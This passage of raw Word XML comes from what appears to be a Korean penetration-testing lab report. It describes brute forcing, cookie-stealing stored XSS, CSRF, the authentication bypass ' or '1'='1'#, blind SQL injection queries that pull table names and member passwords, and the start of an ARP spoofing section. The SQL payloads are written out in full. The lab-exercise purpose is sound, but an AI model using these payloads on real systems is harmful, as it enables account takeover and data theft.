        <w:t xml:space="preserve"> Brute Forcing </w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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실시</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, DB</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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저장된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비밀번호와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일치하는</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Password</w:t>
      </w:r>
      <w:r w:rsidRPr="00C73585">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를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찾아내는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것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확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="0040771B">
      <w:pPr>
        <w:pStyle w:val="a4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 xml:space="preserve">SS[Cross Site Script] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73585" w:rsidRDefault="00C73585" w:rsidP="00C73585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4312920" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="그림 32" descr="https://lh5.googleusercontent.com/q_-TXyJFvw-JhHK8yiSQKvJ6BqIe1JbmlJ06192cLv8HPBYFlMs225J7dcvHBlU40sDG7IsCC6de5Q72bW6Zwgm7XnKeI4T2peY0-62wMk5KIn7C8LLBDSiU4KxW0I26ScBEk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q_-TXyJFvw-JhHK8yiSQKvJ6BqIe1JbmlJ06192cLv8HPBYFlMs225J7dcvHBlU40sDG7IsCC6de5Q72bW6Zwgm7XnKeI4T2peY0-62wMk5KIn7C8LLBDSiU4KxW0I26ScBEkMB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 xml:space="preserve">SS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
      <w:r w:rsidR="005D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">을 이용해 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>게시 글에 J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ava script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>를</w:t>
      </w:r>
      <w:r w:rsidR="005D4EB1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>등록해</w:t>
      </w:r>
      <w:r w:rsidR="005D4EB1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>세션 쿠키 값 획득이 가능한지 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB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35780" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="33" name="그림 33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B1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB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5D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">확인 후 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BT</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">으로 돌아와 웹 서비스를 실행 후 쿠키 값을 저장하기 위한 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>파일 생성</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB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28160" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34" name="그림 34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B1" w:rsidRPr="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB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5D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">XSS </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격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및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확인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유도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게시</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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글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업로드</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>게시</w:t>
      </w:r>
      <w:r w:rsidRPr="005D4EB1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia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글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확인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후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세션이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저장된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파일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확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB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58640" cy="1508760"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="35" name="그림 35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B1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB1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저장된 세션을 적용 후 세션이 유지되는지 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB1">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRDefault="005D4EB1" w:rsidP="005D4EB1">
      <w:pPr>
        <w:ind w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005D4EB1" w:rsidRPr="00B609F1" w:rsidRDefault="005D4EB1" w:rsidP="0040771B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RF</w:t>
      </w:r>
      <w:r w:rsidR="00B609F1" w:rsidRPr="00B609F1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00B609F1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="00B609F1" w:rsidRPr="00B609F1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">공격 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00B609F1">
      <w:pPr>
        <w:ind w:firstLine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4290060" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="36" name="그림 36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Pr="00B609F1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B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>회원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정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수정에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공격자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의도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비밀번호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변경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시도하려고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했으나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기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비밀번호를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확인하는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과정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포함되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공격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어려움</w:t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297680" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="37" name="그림 37" descr="https://lh3.googleusercontent.com/GDBnRJCy-fq6XzveZ5GODxgwmye7X0yYNpkhQ19nxCIlBJ9fqvLEBlk4kJtIbOr2L5JpOmiwjPLAunSTlGFK_FKDqu0usGDPuNQTkcYsVJgavpIWHLw66bWiYEuCv3_G9SZuw_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3.googleusercontent.com/GDBnRJCy-fq6XzveZ5GODxgwmye7X0yYNpkhQ19nxCIlBJ9fqvLEBlk4kJtIbOr2L5JpOmiwjPLAunSTlGFK_FKDqu0usGDPuNQTkcYsVJgavpIWHLw66bWiYEuCv3_G9SZuw_i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05300" cy="1211580"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="38" name="그림 38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글을 게시할 때 넘어가는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Packet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>을 확인하고 자동 광고가 가능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시 글 작성 및 업로드</w:t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12920" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39" name="그림 39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업로드 된 게시 글을 확인하면 공격자가 원하는 게시 글이 자동으로 등록되는 것을 볼 수 있음 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0010076E" w:rsidRPr="0010076E" w:rsidRDefault="0010076E" w:rsidP="0010076E">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRDefault="00B609F1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B609F1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="22"/>
        </w:rPr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B609F1" w:rsidRPr="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00B609F1">
      <w:pPr>
        <w:pStyle w:val="a4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인증 우회 공격</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRDefault="00B609F1" w:rsidP="00B609F1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472940" cy="1676400"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="40" name="그림 40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Pr="0040771B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B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">‘ or ‘1’=’1’# </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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이용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다른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인증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우회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공격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실패</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>단</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> DB </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>상에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해당</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>쿼리를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실행했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때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가장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상위에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위치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레코드의</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> pw</w:t>
      </w:r>
      <w:r w:rsidRPr="00B609F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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같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값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비밀번호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입력하는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경우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해당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레코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계정으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접속됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRPr="00B609F1" w:rsidRDefault="0040771B" w:rsidP="0040771B">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1164"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B609F1" w:rsidRPr="0040771B" w:rsidRDefault="0040771B" w:rsidP="00B609F1">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>lind SQL Injection</w:t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434840" cy="685800"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="41" name="그림 41" descr="https://lh3.googleusercontent.com/g6KjBXbJbSzN95tO9TUWnXFvnAePXI-uQIQT4YbEubF4_69jDynAlV45SIUshmtTCJz0Lr0sltzxGxN9R3N8zvWentzBdAN82JJgxq5GFhoX_JCFljunHFSd2A6PwBLCNzqHrw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3.googleusercontent.com/g6KjBXbJbSzN95tO9TUWnXFvnAePXI-uQIQT4YbEubF4_69jDynAlV45SIUshmtTCJz0Lr0sltzxGxN9R3N8zvWentzBdAN82JJgxq5GFhoX_JCFljunHFSd2A6PwBLCNzqHrwFU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szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection Vector </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771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1912620" cy="708660"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="그림 4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529840" cy="655320"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="43" name="그림 4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lind SQL Injection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격을 통해 D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 길이와 이름을 확인할 수 있음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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table_name from (select table_name from information_schema.tables where table_schema=’SW_db’ and table_type=’base table’ order by table_name limit 1) as vtable order by table_name desc limit 1))=5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table_name from (select table_name from information_schema.tables where table_schema='SW_db' and table_type='base table' order by table_name limit 1) as vtable order by table_name desc limit 1), 1, 1)=char(0x42)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(select table_name from (select table_name from information_schema.tables where table_schema=’SW_db’ and table_type=’base table’ order by table_name limit 1) as vtable order by table_name desc limit 1)=”board”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column_name</w:t>
      </w:r>
      <w:r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 xml:space="preserve">from (select column_name from information_schema.columns where table_name='board' order by column_name limit 1) as </w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>vtable order by column_name desc limit 1))=7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column_name from (select column_name from information_schema.columns where table_name='greet' order by column_name limit 1) as vtable order by column_name desc limit 1),1,1)=char(0x43)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(select column_name from (select column_name from information_schema.columns where table_name='board'\ order by column_name limit 1) as vtable order by column_name desc limit 1)=”content”%23</w:t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위 쿼리 문을 이용해 T</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>able, Column</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 이름을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771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732020" cy="510540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="44" name="그림 44" descr="https://lh5.googleusercontent.com/DbNCB44fBsuTdZL1Te7mDQAu95q4kFLBwhLZJJQAs-2aX41Fh-EkMab3ollGTUnAC1pCfl2R9jmoUsu5p9-nP9TMvtfOLPWt22uB3dNwcX6D52W4krx-IshVVj7AKMylSiATkj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DbNCB44fBsuTdZL1Te7mDQAu95q4kFLBwhLZJJQAs-2aX41Fh-EkMab3ollGTUnAC1pCfl2R9jmoUsu5p9-nP9TMvtfOLPWt22uB3dNwcX6D52W4krx-IshVVj7AKMylSiATkjR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가 가지고 있는 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>의 길이 및 내용 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771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93920" cy="99871"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="그림 45" descr="https://lh5.googleusercontent.com/7zumQZIgOxYQcSPheNGTYRk3g61qV_QWRJGppoxvJ6KndlCrNFDkDxgZNzS8TeTIoaseHGts_lYlIVoJ532sjkq_1dxL5nrmbZjfwqRs0U1eOP-F44J7hhD4VLMPKt0RYpGUV4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5.googleusercontent.com/7zumQZIgOxYQcSPheNGTYRk3g61qV_QWRJGppoxvJ6KndlCrNFDkDxgZNzS8TeTIoaseHGts_lYlIVoJ532sjkq_1dxL5nrmbZjfwqRs0U1eOP-F44J7hhD4VLMPKt0RYpGUV4cZ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74" cy="1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pw from (select id,pw from member order by id limit 1) as vtable order by id desc limit 1))=6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pw from (select id,pw from member order by id limit 1) as vtable order by id desc limit 1), 1, 1)=char(0x42)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ass from (select id,pw from member order by id limit 1) as vtable order by id desc limit 1)=”hacker”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select pw from member where id =”hacker”)=6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select pw from member where id =”hacker”), 1, 1)=char(0x42)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)=”hacker”%23</w:t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비밀번호의 길이 및 내용 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B">
      <w:pPr>
        <w:ind w:left="804"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B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40771B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">네트워크 보안 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B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40771B">
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>ARP Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0040771B" w:rsidRDefault="0040771B" w:rsidP="0040771B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32660" cy="1082040"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="46" name="그림 46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92680" cy="1112520"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="47" name="그림 47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Pr="00802FA8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0771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>공격자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경영기획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네트워크에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침입해</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> BT</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>으로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Gate</w:t>
      </w:r>
      <w:r w:rsidR="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>way</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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자신이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경영관리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직원</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC[10.10.20.10]</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이라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속이고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경영관리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직원</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> PC</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>에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자신이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="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ateway</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[10.10.20.254]</w:t>
      </w:r>
      <w:r w:rsidRPr="0040771B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>라고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속임</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00802FA8" w:rsidRPr="00802FA8" w:rsidRDefault="00802FA8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802FA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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802FA8" w:rsidRDefault="00802FA8" w:rsidP="00802FA8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46960" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="48" name="그림 48" descr="https://lh6.googleusercontent.com/zBA6bjQNj3QRJdc3SgXyxwvCsu01n-Ye6FDdjGv3-uWq3RTaamYPmew8MJjFheaBbv1iMPleMbbywNWU3b1eLmLAIebaAltbOqWMAYGTpFL4-3uk9eEB6Yy1mHZubvnqqLFUqh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6.googleusercontent.com/zBA6bjQNj3QRJdc3SgXyxwvCsu01n-Ye6FDdjGv3-uWq3RTaamYPmew8MJjFheaBbv1iMPleMbbywNWU3b1eLmLAIebaAltbOqWMAYGTpFL4-3uk9eEB6Yy1mHZubvnqqLFUqhww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16480" cy="1348740"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3810"/>
